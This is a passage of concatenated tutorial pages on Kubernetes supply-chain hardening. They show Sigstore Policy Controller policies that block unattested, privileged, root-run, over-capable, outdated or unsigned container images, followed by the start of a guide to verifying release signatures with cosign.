name:must-have-spdx-attestationpredicateType:https://spdx.dev/Documentpolicy:type:cuedata:|predicateType:"https://spdx.dev/Document"The glob: ** line, working in combination with the authorities and policy sections, will allow any image that has at least a SBOM attestation with predicate type https://spdx.dev/Document to be admitted into your cluster. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/must-have-spdx-cue created Now run the k8s.gcr.io/pause:3.9 image which does not have a SBOM attestation: kubectl run --image k8s.gcr.io/pause:3.9 noattestedimage Since the image does not contain any attached SBOM, you will receive a message that the pod was rejected: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: demo: spec.containers[0].image k8s.gcr.io/pause:3.9 no matching attestations with type https://spdx.dev/Document Finally, we run registry.enforce.dev/chainguard/node image which contains a SBOM attestation of type https://spdx.dev/Document: kubectl run --image registry.enforce.dev/chainguard/node mysbomattestedimage Since the image has now a SBOM attestation, you will receive a message that the pod was created successfully: pod/mysbomattestedimage created Delete the pod once you’re done experimenting with it: kubectl delete pod mysbomattestedimage To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### Disallowing Non-Default Capabilities URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-non-default-capabilities-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers with extra capabilities. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod is running with one or many Linux capabilities from defined set of safe capabilities flags. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that ensures pods only run with safe capabilities and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: non-default-capabilities-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | #Allowed: "AUDIT_WRITE" | "CHOWN" | "DAC_OVERRIDE" | "FOWNER" | "FSETID" | "KILL" | "MKNOD" | "NET_BIND_SERVICE" | "SETFCAP" | "SETGID" | "SETPCAP" | "SETUID" | "SYS_CHROOT" spec: { initContainers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] containers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] ephemeralContainers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] } The Policy Controller will check each type of container’s definition (initContainers, containers, and ephemeralContainers) in a pod spec for any added capabilities. The controller will only admit a pod if the added capabilities are in the #Allowed set. The set of allowed capabilities is defined in this portion of the CUE policy and can be added to or changed to match your specific workload’s needs: #Allowed: "AUDIT_WRITE" | "CHOWN" | . . . Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/non-default-capabilities-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods running with privileges, you’ll create a pod that runs without unnecessary capabilities and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs with elevated privileges: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: capabilities: add: # Violates restricted-capabilities - NET_ADMIN drop: - ALL Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: non-default-capabilities-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.capabilities.add.0: 12 errors in empty disjunction: (and 12 more errors) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and remove or edit the add portion of the capabilities section. If there are no extra capabilities then the section should look like the following: capabilities: drop: - ALL Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now ensures the container does not have and extra capabilities, or only those from the #Allowed set, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Disallowing Privileged Pods URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-privileged-containers-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers with elevated privileges. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod is running without the privileged: true setting. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that only admits unprivileged pods and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: privileged-containers-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { initContainers: [...{ securityContext: { privileged: false } }] containers: [...{ securityContext: { privileged: false } }] ephemeralContainers: [...{ securityContext: { privileged: false } }] } This policy will ensure that any kind of container in a pod spec will only be admitted if the privileged setting is not set, or is set to false. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/privileged-containers-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods running with privileges, you’ll create a pod that runs without elevated privileges and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs with elevated privileges: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: privileged: true Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: privileged-containers-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.privileged: conflicting values false and true The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the privileged setting to false: privileged: false Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now ensures the container does not have elevated privileges, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Disallowing Run as Root User URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-run-as-root-user-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers as the root user in a Kubernetes cluster. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod is running as a non-root user. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that ensures pods do not run as the root user and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: disallow-runasuser-root-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { initContainers: [...{ securityContext: { runAsUser: != 0 } }] containers: [...{ securityContext: { runAsUser: != 0 } }] ephemeralContainers: [...{ securityContext: { runAsUser: != 0 } }] } This policy will ensure that any kind of container in a pod spec will only be admitted if the user is not root. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/disallow-runasuser-root-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods running as root, you’ll create a pod that runs as a non-root user and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs as root: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: # Violates restricted-capabilities runAsUser: 0 Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "/tmp/pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: disallow-runasuser-root-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.runAsUser: invalid value 0 (out of bound !=0) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the runAsUser setting to use a non-root user: - runAsUser: 65532 Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now uses a non-root user to run its processes, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Maximum Container Image Age URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/maximum-image-age-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to verify image signatures before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks the maximum age of a container image verifying that isn’t older than 30 days. For that, we’ll attempt to create two distroless images one older than 30 days and a fresh one. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image ghcr.io/distroless/static myoldimage Since there is no ClusterImagePolicy defined yet, the Policy Controller will allow the admission request. In the next step, you will define a policy that verifies Chainguard Containers has an age below 30days and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: # Copyright 2022 Chainguard, Inc.# SPDX-License-Identifier: Apache-2.0apiVersion:policy.sigstore.dev/v1beta1kind:ClusterImagePolicymetadata:name:maximum-image-age-regoannotations:catalog.chainguard.dev/title:Maximum image agecatalog.chainguard.dev/description:|This checks that the maximum age an image is allowed to have is 30 days old. This is measured using the container image's configuration, which has a "created" field. Some build tools may fail this check because they build reproducibly, and use a fixed date (e.g. the Unix epoch) as their creation time, but many of these tools support specifying SOURCE_DATE_EPOCH, which aligns the creation time with the date of the source commit.catalog.chainguard.dev/labels:regospec:images:[{glob:"**"}]authorities:[{static:{action:pass } }]mode:enforcepolicy:fetchConfigFile:truetype:"rego"data:|package sigstore nanosecs_per_second = 1000 * 1000 * 1000 nanosecs_per_day = 24 * 60 * 60 * nanosecs_per_second # Change this to the maximum number of days to allow. maximum_age = 30 * nanosecs_per_day isCompliant[response] { created := time.parse_rfc3339_ns(input.config[_].created) response := { "result" : time.now_ns() < created + maximum_age, "error" : "Image exceeds maximum allowed age." } }The glob: ** line, working in combination with the authorities and policy sections, will allow any image that has been built in the last 30 days to be admitted into your cluster. The fetchConfigFile options instruct the Policy Controller to check the image configuration looking for the age of the image. The rest of fields are: authorities: this setting tells the Policy Controller to skip any verification looking for the presence of an image signature. mode: this blocks the creation of any image older than 30days. policy.data: contains the rego policy itself that verifies when the image has been created. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/maximum-image-age-rego created Now run the cgr.dev/chainguard/static image again: kubectl run --image cgr.dev/chainguard/static mydailyfreshimage Since the image is built on daily basis, you will receive a message that the pod was created successfully: pod/mydailyfreshimage created However, if we now create a pod using our old image myoldimage, PolicyController rejects the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: ghcr.io/distroless/static@sha256:a9650a15060275287ebf4530b34020b8d998bd2de9aea00d113c332d8c41eb0b failed evaluating rego policy for type ClusterImagePolicy: policy is not compliant for query 'isCompliant = data.sigstore.isCompliant' with errors: Image exceeds maximum allowed age. Delete the pod once you’re done experimenting with it: kubectl delete pod mydailyfreshimage To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### Disallowing Unsafe sysctls URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-unsafe-sysctls-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to only allow pods that use sysctls to modify kernel behaviour to run with the safe set of parameters. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec that uses sysctls, and only allow admission into a cluster if the pod is running a safe set parameters. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image docker.io/ubuntu ubuntu Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image index.docker.io/library/ubuntu@sha256:854037bf6521e9c321c101c269272f756e481fb5f167ae032cb53da08aebcd5a In the next step, you will define a ClusterImagePolicy that verifies a pod spec is using safe sysctl parameters. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: unsafe-sysctls-mask-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { securityContext: sysctls: [...{ name: "kernel.shm_rmid_forced" | "net.ipv4.ip_local_port_range" | "net.ipv4.ip_unprivileged_port_start" | "net.ipv4.tcp_syncookies" | "net.ipv4.ping_group_range" }] } This policy will ensure that any pod that has a sysctl defined in its spec will only be admitted if it matches a parameter from the list. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/unsafe-sysctls-mask-cue Next, you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods using unsafe sysctls, you’ll create a pod with a safe parameter and admit it into your cluster. Step 3 — Testing the ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that uses an unsafe sysctl: apiVersion: v1 kind: Pod metadata: name: yolo spec: securityContext: sysctls: - name: kernel.msgmax value: "65536" containers: - name: "app" image: docker.io/ubuntu Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "/tmp/pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: unsafe-sysctls-mask-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:854037bf6521e9c321c101c269272f756e481fb5f167ae032cb53da08aebcd5a failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.securityContext.sysctls.0.name: 5 errors in empty disjunction: (and 5 more errors) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the sysctls section to use the following safe parameter: sysctls: - name: net.ipv4.tcp_syncookies value: "1" - name: net.ipv4.tcp_syncookies value: "1" Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the `net.ipv4.tcp_syncookies` sysctl is considered safe and only runs in specific Kubernetes namespaces, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you're done experimenting with it: kubectl delete pod yolo --- ### Verify Signed Chainguard Containers URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/using-policy-controller-to-verify-signed-chainguard-images/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy, Chainguard Containers This guide demonstrates how to use the Sigstore Policy Controller to verify image signatures before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks for a keyless Cosign image signature, and then test the admission controller by running a signed nginx image. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that verifies Chainguard Containers are signed and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion:policy.sigstore.dev/v1beta1kind:ClusterImagePolicymetadata:name:chainguard-images-are-signedannotations:catalog.chainguard.dev/title:Chainguard Containerscatalog.chainguard.dev/description:Enforce Chainguard Containers are signedcatalog.chainguard.dev/labels:chainguardspec:images:- glob:cgr.dev/chainguard/**authorities:- keyless:url:https://fulcio.sigstore.devidentities:- issuer:https://token.actions.githubusercontent.comsubject:https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/mainctlog:url:https://rekor.sigstore.devname:authority-0The glob: cgr.dev/chainguard/** line, working in combination with the authorities section, will allow any image in the cgr.dev/chainguard image registry that has a keyless signature to be admitted into your cluster. The - keyless options instruct the Policy Controller what to check for when it examines the signature on any image from the cgr.dev/chainguard registry. The specific fields are: url: this setting tells the Policy Controller where to find the Certificate Authority (CA) that issued an image signature. issuer: the issuer field contains the URI of the OpenID Connect (OIDC) Identity Provider that digitally signed the identity token. subject: the subject field must contain a URI or an email address that identifies where the signed image originated. ctlog: this setting tells the Policy Controller which Certificate Transparency log to query when it is validating a signature. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/chainguard-images-are-signed created Now run the cgr.dev/chainguard/nginx:latest image again: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since the image matches the policy, you will receive a message that the pod was created successfully: pod/nginx created In the background, the Policy Controller queries the specified ctlog from the policy that you created to find a record in the log that matches the image being requested (cgr.dev/chainguard/nginx:latest). The Policy Controller ensures that the SHA256 hash of the image matches the hash that is recorded in the certificate issued by the OIDC issuer when the image was first signed. Finally, the Policy Controller verifies the issued certificate was signed by the specified Certiciate Authority’s (https://fulcio.sigstore.dev) root signing certificate. Once the Policy Controller verifies the signature of the image’s hash in the transparency log matches the computed hash of the image, and the certificate’s validity based on the CA chain of trust, it will admit the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod nginx To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### How to Verify File Signatures with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-verify-file-signatures-with-cosign/ Last Modified: November 13, 2024 Tags: Cosign, Procedural Cosign can be used to verify binary artifacts (“blobs”) using provided signatures as long as they are published to an OCI registry. In this tutorial, we’ll verify a binary artifact — in this case, a release of apko, a command-line tool for building container images using a declarative language based on YAML. The methods in this tutorial apply to any blob file Cosign has signed with a keyless signature. This tutorial assumes you have Cosign installed. Verifying a binary with Cosign keyless signatures All apko releases include keyless signatures using Cosign. You can verify the signature for an apko release using the cosign tool directly, or by calculating the SHA256 hash of the release and finding the corresponding Rekor transparency log entry. If you would like to learn how to verify a binary using Rekor or curl, follow the steps in our guide on How to Verify File Signatures with Rekor or curl. We’ll use the apko_0.19.9_linux_arm64.tar.gz tar archive from the apko GitHub Release v0.19.9 page in this example. There are three URLs from the list of assets on that page that you will need to copy: The release itself: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz The signature file: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig The public certificate: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt With these URLs, construct (or copy) the following command to verify the tar archive: cosign verify-blob \ --signature https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig \ --certificate https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt \ --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \ --certificate-identity "https://github.com/chainguard-dev/apko/.github/workflows/release.yaml@refs/tags/v0.19.9" \ https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz Running the command may take a moment, but when it completes you will receive the following output: Verified OK If any of the URLs are incorrect, if there was a problem with the apko release file, if the signature or certificate identity don’t match, or if the release file was not signed, you will receive an error like the following: Error: searching log query: [POST /api/v1/log/entries/retrieve][400] searchLogQueryBadRequest &{Code:400 Message:verifying signature: invalid signature when validating ASN.1 encoded signature} main.go:74: error during command execution: searching log query: [POST /api/v1/log/entries/retrieve][400] searchLogQueryBadRequest &{Code:400 Message:verifying signature: invalid signature when validating ASN.1 encoded signature} You can also download the files and verify them locally: curl -L -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz \ -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig \ -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt You can then verify the files that you downloaded using Cosign: cosign verify-blob \ --signature apko_0.19.9_linux_arm64.tar.gz.sig \ --certificate apko_0.19.9_linux_arm64.tar.gz.crt \ --certificate-oidc-issuer 